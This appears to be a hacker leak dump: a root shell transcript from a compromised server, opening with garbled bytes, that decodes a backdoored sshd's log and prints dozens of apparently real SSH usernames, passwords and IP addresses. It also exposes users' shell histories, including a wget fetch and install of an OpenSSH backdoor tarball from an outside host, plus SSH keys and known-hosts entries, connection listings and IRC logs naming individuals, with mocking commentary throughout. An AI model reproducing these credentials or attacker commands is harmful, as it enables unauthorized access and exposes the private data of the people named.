BD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#648;&#1165;&#906;&#1166;&#781;&#1158;&#543;&#967;&#798;<3B>&#136;&#145;&#139;&#333;<3B><>&#156;<3B>&#1226;&#741;<3B>&#65533;<3B><><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#148;<3B>&#138;&#158;<3B><>&#158;&#350;&#140;&#147;&#140;&#1030;&#908;&#65533;<3B><><EFBFBD>&#415;&#156;&#146;&#146;&#332;&#148;&#134;&#147;&#150;&#145;&#885;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;&#156;&#147;&#154;&#331;&#1011;&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;<3B>&#150;&#146;<3B>&#150;&#145;&#149;&#152;&#398;&#140;&#140;&#152;&#134;&#997;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#832013;
[root@velocity:/var/run]# cat lame.c
#include <stdio.h>
int main(int argc, char *argv[])
{
FILE *n00bfile;
unsigned int lamechar;
if(argc < 2)
printf("Usage: %s filename\n",argv[0]);
if((n00bfile = fopen(argv[1],"r"))) {
while((lamechar = fgetc(n00bfile)) != EOF) {
printf("%c",~lamechar);
}
fclose(n00bfile);
}
return 0;
}
// Let's try out our complex decryption program..
[root@velocity:/var/run]# gcc -o lame lame.c
[root@velocity:/var/run]# rm lame.c
[root@velocity:/var/run]# ./lame ssh.old
HOOKIN: romeo:bu9fjogr
HOOKIN: pimpinjg:1ssgy0ZACGUZFS // Our luvbirdz once again.. This time hidding..:)
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: cpu:lloverAa1
HOOKIN: cpu:lloverAa1
HOOKIN: chaos1:ma012th
HOOKIN: yaquis:closereply456
HOOKIN: smash:n1gwh0re
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 lag:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 l:droppinshitlikeanalien
HOOKOUT: 98.192.246.70 lag:vanity09
HOOKOUT: 98.192.246.70 lag:vanity09
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: matt:zeda02
HOOKIN: yaquis:closereply456
HOOKIN: psycoz:jelesuis
HOOKIN: psycoz:jelesuis
HOOKIN: yaquis:closereply456
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: kruapra:asls0923
HOOKIN: omgwtf:nokiaz
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: matt:zeda02
HOOKIN: ste:tcxm1212
HOOKIN: cazz1961:c4zzy1rcd
HOOKIN: apo:parolka
HOOKIN: apo:parolka
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: smash:n1gwh0re
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: blkgraz:.Blind1.
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: alexbb:noizarte
HOOKOUT: 189.14.205.42 junior:123
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: matt:zeda02
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: chaos1:ma012th
HOOKIN: katsst:ch0w$ie
HOOKIN: katsst:ch0w$ie
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 98.192.246.70 cycle:t00L8
HOOKOUT: 98.192.246.70 smash:n1gwh0re
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 189.14.205.42 junior:123
HOOKOUT: 98.192.246.70 smash:n1gwh0re
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKOUT: 89.46.100.252 cycle:t00l8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: yaquis:closereply456
HOOKIN: yaquis:closereply456
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
HOOKOUT: 98.124.176.76 cyber:t00L8
HOOKOUT: 89.46.100.252 cyber:t00l8
HOOKOUT: 98.124.176.76 cycle:t00l8
HOOKOUT: 98.124.176.76 cycle:t00L8
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ // puma.makosolutions.com
HOOKIN: chaos1:ma012th
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: kruapra:asls0923
HOOKIN: cmm:skylin3
HOOKIN: chaos1:ma012th
HOOKOUT: 89.46.100.252 cycle:t0L8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKOUT: 89.46.100.252 cycle:t00L8
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: katsst:ch0w$ie
HOOKIN: yaquis:closereply456
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: smash:n1gwh0re
HOOKIN: katsst:ch0w$ie
HOOKIN: yaquis:closereply456
HOOKIN: yaquis:closereply456
HOOKIN: ioplex:I*!@ONLINE
HOOKIN: pimpinjg:1ssgy0ZACGUZFS
HOOKIN: katsst:ch0w$ie
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKIN: blkgraz:.Blind1.
HOOKOUT: 89.46.100.252 cycle:t00L8
[root@velocity:/var/run]#
// 0wn3d by y0ur 0wn backd00r..
[root@velocity:~]# cat /etc/profile
# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
#
# System-wide .profile file for sh(1).
#
# Uncomment this to give you the default 4.2 behavior, where disk
# information is shown in K-Blocks
# BLOCKSIZE=K; export BLOCKSIZE
#
# For the setting of languages and character sets please see
# login.conf(5) and in particular the charset and lang options.
# For full locales list check /usr/share/locale/*
# You should also read the setlocale(3) man page for information
# on how to achieve more precise control of locale settings.
#
# Read system messages
# msgs -f
# Allow terminal messages
# mesg y
export PS1="[\u@\h:\w]\\$ "
alias ls='/bin/ls -GFa'
alias ll='/bin/ls -GFal'
alias lo='/bin/ls -GFalo'
export LSCOLORS=ExGxFxf5CxfgDxabagacad
export EDITOR=pico
TMOUT=1800
export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
export HISTSIZE=1500
[root@velocity:~]#
// After a while...
[root@velocity:~]# cat /root/.bshrc
w
rm -rf hax
rm -rf lol.tar.gz
ls -la
exit
w
wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
tar -zxf lol.tar.gz
cd hax
ls -la
ssh -v
vi version.h // OpenSSH Version editing
./quick // Installation
cd ..
ls -la
cd /home/romeo/
ls -la
cat .bash_history
ls -la
cd .irssi/
ls -la
rm -rf away.log // Too late..
cd ..
ls -la
w
ps aux | grep ssh
netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills..
netstat -an | grep 22
netstat -an | grep ssh
netstat -a | grep 22
netstat -an | grep .22
env
netstat -an | grep 188.51.85.13
netstat -an | grep 248.22
w
netstat -anp | grep 248.22
netstat -an | grep 248.22
whois 98.242.244.25
ps aux | grep ssh
kill -9 8095
kill -9 8128
kill -9 8866
ps aux | grep ssh
kill -9 92546
kill -9 93418
w
env
netstat -an | grep 188.51.85.13
netstat -an | grep .248.22
w
ls -al
cat > w
sh x
sh w
ls -la
bas w
bash w
ls -la
cat w
netstat -tanp
ps aux | grep ssh
kill -9 43929
kill -9 75936
kill -9 75934
ps aux | grep ssh
kll -9 23783
kill -9 23783
ps aux | grep ssh
time
date
ls -la
chmod +x w
./w
ls -la
rm -f w
ps aux | grep ssh
kill -9 22353
ps aux | grep ssh
kill -9 9078
ps aux | grep ssh
env
netstat -an | grep 188.51.85.13
netstat -an | grep .248.22
csf
last | grep 98.242.244.25
lastlog
w
ls -la
netstat -anp tcp
netstat -anp tcp | grep .22
netstat -anp tcp | grep 72.20.28.226.6697
netstat -anp
netstat -anp tcp
sockstat
ps aux | grep ioplex
exit
w
cd ~pimpinjg/
ls -la
cat .bash_history
w
ls -la
cd /
ls -la
cd /tmp
ls -la
cd /var/log
ls -la
tail -f messages
cat security | grep romeo
cat security | grep root
w
cd ~romeo
ls -la
cat .bash_history
ps aux | grep romeo
ps aux | grep romeo
ps aux | grep ssh
w
ls -la
w
ls -la
ps aux
ps aux | grep irc
ping velocity.vitalspeeds.com
[root@velocity:~]#
/*
RoMe0 in panic mode.. netstat.. netstat.. netstat..
Thank you for all the fish.. n00bfish..
*/
[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc
nano .bashrc
clear
ls
grep -r motd
grep -r motd *
clear
rm -rf znc*
clear
ls
clear
PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
clear
uptime
ps aux
ls -al
uptime
clear
ls
nano .profile
nano .bashprompt
exit
clear
screen -r
clear
exit
clear
screen -r
screen -r
clear
exit
[root@velocity:~]#
// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off..
[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts
localhost ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
72.20.28.205 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxLk6rsYWY3ASi1AXMnWKeEd9Tqdcw0P+v7gGKHjGUdcPQZ00S5xotswbKD4/XI3StqVkQLOrcOvDebZ7uJjSpW/d7G1BeMdav8QjS+Q/Hxk8tzPPI+95/iviCW3dQbtxOEdXwcgTucw7d4GaGqexScbG+kOYzGc6ZZxSKJlqiM29s6ri1kfLDay/5/YZnz3Ms3081Hsxnrdbb0TOrpOJdbirgL4Ipe0DBaf1d/QQxGf6CFTbFKsm4RWuQWICiF7AFmHqgElMUYodjnDTmJjwjFbIipUsPvEjNabuYXHkUaA2iOYvpso13HdgYVdgJpFc269L435Uh4XBolEziEnrWQ==
189.14.205.42 ssh-dss AAAAB3NzaC1kc3MAAACBAJgf4VlHspyNWVtAQpi0Lsf78P5bted4NBEAk0MX6w0DNnomC1/kiqOa2pNeZSB05NT42z8+Pxc2a5JwNRolfbpRXPMvMvHYwDMsZAYerz6KOc04nwVskMLBP47bBV6IMbJf2DV7OMBuZI4Li7QfAyW/qJpwUnctChFjSscyv+srAAAAFQDiHNMyrvXk8AJkeKusaJ9vUGdtJwAAAIBr1lDX9MHqMpoeZFE3vX6VbrPfBqK5Zm0EgdSf9QdbGFVD5YcLQhyc88jsrR2sCUBNmQN9hV8o7NedqAFQK1RKToN7ZvrzuFNcOT+yO6/B1Z2WniNojmrbd7/27dJCQz02yXl96f1pFUUcU7gRMdgI9WngNqOE8ZMl3B/jw/MwuAAAAIAoMJDeUlKhowiywrlFC511AfRe+5KfhqK2ohhKne1yr4r5fBrVeTsZeN39qeu23dUOTc7xXP47Iu7STxF7vX6Jw29OWx9vytwbCGNHPMr1kTgRr9n+lHutOZmCqvag2rALA8gs+KUfYrwdUs1p7PDVuTO8bk4HRSPs9wCQnlmpOg==
[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch
[root@velocity:/var/run]# lsof -i -n | grep ssh
sshd 19971 root 3u IPv6 0xcc1771d0 0t0 TCP *:ssh (LISTEN)
sshd 19971 root 4u IPv4 0xc585e000 0t0 TCP *:ssh (LISTEN)
sshd 23362 root 3u IPv4 0xca6ae570 0t0 TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED)
sshd 23383 romeo 3u IPv4 0xca6ae570 0t0 TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED)
sshd 28333 root 3u IPv4 0xc9fc4570 0t0 TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
sshd 28335 yaquis 3u IPv4 0xc9fc4570 0t0 TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
sshd 30593 root 3u IPv4 0xc97b93a0 0t0 TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
sshd 30595 katsst 3u IPv4 0xc97b93a0 0t0 TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
sshd 30595 katsst 10u IPv4 0xc5b901d0 0t0 TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
sshd 30595 katsst 11u IPv4 0xc590eae0 0t0 TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
sshd 30595 katsst 12u IPv4 0xc94fc570 0t0 TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
sshd 30595 katsst 13u IPv4 0xc5eb2910 0t0 TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
sshd 30595 katsst 14u IPv4 0xc996d000 0t0 TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
sshd 30595 katsst 15u IPv4 0xc954e910 0t0 TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
sshd 30595 katsst 17u IPv4 0xc99f81d0 0t0 TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
sshd 30595 katsst 18u IPv4 0xca0c1570 0t0 TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
sshd 30595 katsst 19u IPv4 0xcaf02910 0t0 TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
sshd 30595 katsst 22u IPv4 0xc9dd9740 0t0 TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
sshd 30595 katsst 23u IPv4 0xc622c570 0t0 TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
sshd 30595 katsst 27u IPv4 0xca10bcb0 0t0 TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
sshd 30595 katsst 28u IPv4 0xcc5021d0 0t0 TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
sshd 30595 katsst 29u IPv4 0xcc3dd740 0t0 TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
sshd 30595 katsst 30u IPv4 0xc972b740 0t0 TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
sshd 30595 katsst 35u IPv4 0xca1413a0 0t0 TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
sshd 30595 katsst 38u IPv4 0xc61be910 0t0 TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
sshd 30595 katsst 42u IPv4 0xca1cb1d0 0t0 TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
sshd 30595 katsst 43u IPv4 0xc9db61d0 0t0 TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
sshd 30595 katsst 46u IPv4 0xc61bd3a0 0t0 TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
sshd 30595 katsst 49u IPv4 0xc92c6000 0t0 TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
sshd 30595 katsst 52u IPv4 0xcae45740 0t0 TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
sshd 30595 katsst 56u IPv4 0xca03d740 0t0 TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
sshd 30595 katsst 82u IPv4 0xc9dbacb0 0t0 TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
sshd 30595 katsst 85u IPv4 0xca0793a0 0t0 TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
sshd 30595 katsst 86u IPv4 0xc9a1c000 0t0 TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
sshd 30595 katsst 87u IPv4 0xc986f910 0t0 TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
sshd 30622 root 3u IPv4 0xc98fb000 0t0 TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
sshd 30890 root 3u IPv4 0xc58eb000 0t0 TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
[root@velocity:/var/run]#
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [root@velocity:/]# ps -aux | grep romeo ANTISECFORLULZ
ANTISECFORLULZ root 98610 0.0 0.2 5400 2004 ?? Is 12:16PM 0:00.19 sshd: romeo [priv] (sshd) ANTISECFORLULZ
ANTISECFORLULZ romeo 98648 0.0 0.2 5384 2052 ?? S 12:16PM 0:03.21 sshd: (sshd) ANTISECFORLULZ
ANTISECFORLULZ romeo 27874 0.0 0.6 9104 6212 p0 S+ 2:21PM 0:04.59 irssi -h absolute.ownage.net ANTISECFORLULZ
ANTISECFORLULZ romeo 32521 0.0 0.1 3272 1384 p0 Is 7:40PM 0:00.05 /usr/local/bin/bash ANTISECFORLULZ
ANTISECFORLULZ romeo 27845 0.0 0.1 2040 1376 p2 S+ 2:20PM 0:00.04 screen -r ANTISECFORLULZ
ANTISECFORLULZ romeo 98652 0.0 0.2 3244 1848 p2 Is 12:16PM 0:00.03 -bash (bash) ANTISECFORLULZ
ANTISECFORLULZ root 32868 0.0 0.1 1552 872 p3 L+ 4:23PM 0:00.00 grep romeo ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [root@velocity:/]# killall screen ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal) ANTISECFORLULZ
ANTISECFORLULZ [00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal) ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [12:29am] <~RoMeO> wtf is up with screen :@ ANTISECFORLULZ
ANTISECFORLULZ [12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal] ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <~RoMeO> "[screen is terminating]" with no reason ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <+G-Brain> hah ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <%p3ri0d> oh yeah ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <+G-Brain> it has a few shitty default key bindings ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <~RoMeO> ctrl+D ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <~RoMeO> didnt do that ANTISECFORLULZ
ANTISECFORLULZ [12:33am] <~RoMeO> gay shit ANTISECFORLULZ
ANTISECFORLULZ [12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
[root@velocity:/]# last | grep romeo
romeo ttyp3 188.50.84.224 Thu Jul 2 23:06 - 00:24 (01:17)
romeo ttyp0 188.50.84.224 Thu Jul 2 22:53 - 01:52 (02:58)
romeo ttyp6 188.51.85.13 Thu Jul 2 14:49 - 17:59 (03:09)
romeo ttyp5 188.51.85.13 Thu Jul 2 12:12 still logged in
romeo ttyp5 188.51.85.13 Thu Jul 2 11:02 - 11:05 (00:02)
romeo ttyp5 188.51.85.13 Wed Jul 1 20:29 - 20:29 (00:00)
[root@velocity:/]# cat ~/ssh/known_hosts
light.co1.org ssh-dss AAAAB3NzaC1kc3MAAACBAN3XmImvEAnfEUs2QzYWuj7LVVNVNwPuIDfO9Wb+aSWWRwD28hXbfVSw3llyo+p8aERrCn5FcbVHodgmt7IuEER9roB6AoiH664XsQwIviSx/2mvMrvXVGYmdvtSINnwNH389DS2/chf2gsBz772tTNT2c8myM4drZ2ArkeNP81JAAAAFQDAt8OXB+nbsHkfxhYZzUtY5DWIcwAAAIEAoUvbQneoUMbzYNF71L7/6vQxcV9rnYSAOs7NBB3aH61NG+gYgSh0FL0Ctv2PcqFsjRLE7UK/mcl1Dvq5K87CGfcH4LDCiuI0zB9lWZfWbuN5axCllFczboa4ED5VkPfjEJDmKQbbSvVlQE9TTa3QPY8bxQmcDJ5e4nKcq2s0zbMAAACAPSrhPRr4kNipRtQMAztneiqaixSr6w/8CnXIINAMf/9xWqmg0ZWnsgOpY5t30m6BEEPZL/mjspAXnY5AKS6ZcIOzq5zFnw3Gvgz4E/X5uDvR2TUaEBFQI8noDyzMBH2KTcj2ipuEYr5SKYEtgBB8zCMXuJ2ufDBb0H9tjIJnf8M=
zelda.vitalspeeds.com ssh-dss AAAAB3NzaC1kc3MAAAEBAKPbekcqfiUr+bg1wPxVWTYqnanbeckqLRM7N7g/24kGTi5ITtv4mbbWZrcdlkKOn0pjjpD4/cZ9NOZ5L9kn3+TOb4oozTB4zFbQKqNvQAr7/iw8eR72bdoRyzNCDLZpkM/4nMoMNclyZuUulYf7PHqqqiMVdcPNvis78GteI6uajJEQlIPiLB2oaFWrBvcGmbaBC4iKihvprcJJ+9dsKVlbXVBR6kkjagvr+jkhDxYQ5cWtwy+0+7/tiogvinuTUNdgxyociCv26aLBdwTQuluiJhYSWLR2HnV2qxnNRoqzoIQY8gxLBHDNh58k7puc9KMIE0D9XNDfkf6cSQeQpIMAAAAVAOqStUQquE8fqirTa8WxVJbo99i5AAABAHh+6hGu61iPvGQ20dw3+8+O0rc94famvy9gO2+8USsT4/pyqKVdPtXjZVcwSMVpcO+9Oj4fQSs+KRxmb3pfCmY0sdUpsuSiCaBDxKj7M45C+m9LzgytZi5iaesnOxipp0NS+xgvDJ1fqOj3hmLYl89wo6CCHBZhHo4jJ1/FzBmIXQZJOAsek61DOzkKzSdm8zZDZQEcP/DjNd9tLWWomDvOLZ0kwoUqlF08vxKU19wnMgvFyKUbE8bWq02/gE1dOwZ7IsemosVlVj1ogw/L/J2NeEnESnoYFSBKdKDmRqSvFmgtRGKxhGGjvw63054g+9UzJxOXdVHymqktH9aGQ+MAAAEAdJuQ46uo8jolkRk0hD3zoBweKjZWacEe7OkSw1jxk8LoGV3VjDMqAvf4xcPUje7l6tKeyrdoR1u7LcweDobqn5d8Ok1Ui0zZIf0hQQBGE5ecKNDEE7AOrbc7kBNNInRxgTnkGu87+k6d05tWHyHlXIZTEceblYZ2iM8ZSpKViTO2lL3nq7JwA3sSHX2pcJ0ED5vlw2KtafbXs+8VFga9s1+DJIvF/TrUasW/3Hlt+13/4EHp8H7fJZzEN1SUj8JfGuoLu4rsceCkBYwxPW/zidGxrgkgGZXePnN7Hnttzx8KFFuJRIrIIMiCJFEWcKMBc1+knCgF9iON2h7g0KSACQ==
72.20.18.193 ssh-dss AAAAB3NzaC1kc3MAAACBAKnwL2xkqjelqTjnJT2ZGFEa9xRUpmdVdx0WSc3SAuDBnFmIv3JLOWsUwTzAtbvs8oRc6HTqrhardxR/C5Xym2dxvnYU7cjKxZHSuH3u9lchW1HS6OWr63fPdLXDDU1LWkvPVGCHzZKw1sZti/3LFMW6HWZDgsMyAQ/q+LeD/E2rAAAAFQD/Ftrlj6cfUu6ItwNJ7loaosdwuwAAAIBwuBVkHiiibruCbl6EwrbrZ/YA80HIS6xgVYK3AoAckXoClY2j8xAkRC4EirwsruTyGNK2BexAXx4E7JAkDvDs9hs8EfSo3TixtXuiBQVUSBpVm/P3425MbDioqQtYm1Q8GFP60vdq8DI3nTXvP+4y/KpDPiuwVX8ifyg9gML3+wAAAIBlRfTV+UdJNa2rN5j4EDHiI0xzuv1NEDIDKKH1XJqBZpdAyyqc+mYkLPcFn/3/T8Cw47G24Umou/lh+XK4PCUIXsUEwc3xGjENwRf62AXpvadEjzoUiyMQ5LEnEUyRBxBWTZtqOJE7EGL97kEDg+WnPd0X5qso9BDjP+LaT+Bqnw==
72.20.18.144 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAxYfv1zRyKyjF625A/39tr/lYfiIxeUcA0zrZFCBGD5Na+6BgKMWkTk9UxoIVc7H0hUsmkIejnjEFjjS8Jatao4VKCMXHkfPoVQnhp7bAmHc5ZwgBdAi+ENhN+acKhx3JnRy11q/wviOd2QVkoJQXfqc2zKCLC5LDlDOn2Pjbz3/cU6nOPNub1t2cxzXGZ3ez57uGstob7iXz1xFELB2oskr/Ews0WjmN0HPYSwfL/LntpA5ciBUp2L04pPrJRyH+nYPbUn09j/rmN/d9FxVyzKE7PSeVXRybE6DXZoPG00pTU7gVeb4sMjnCJbo8e8TUHrD3roaoADJK9KGYxfUBSw==
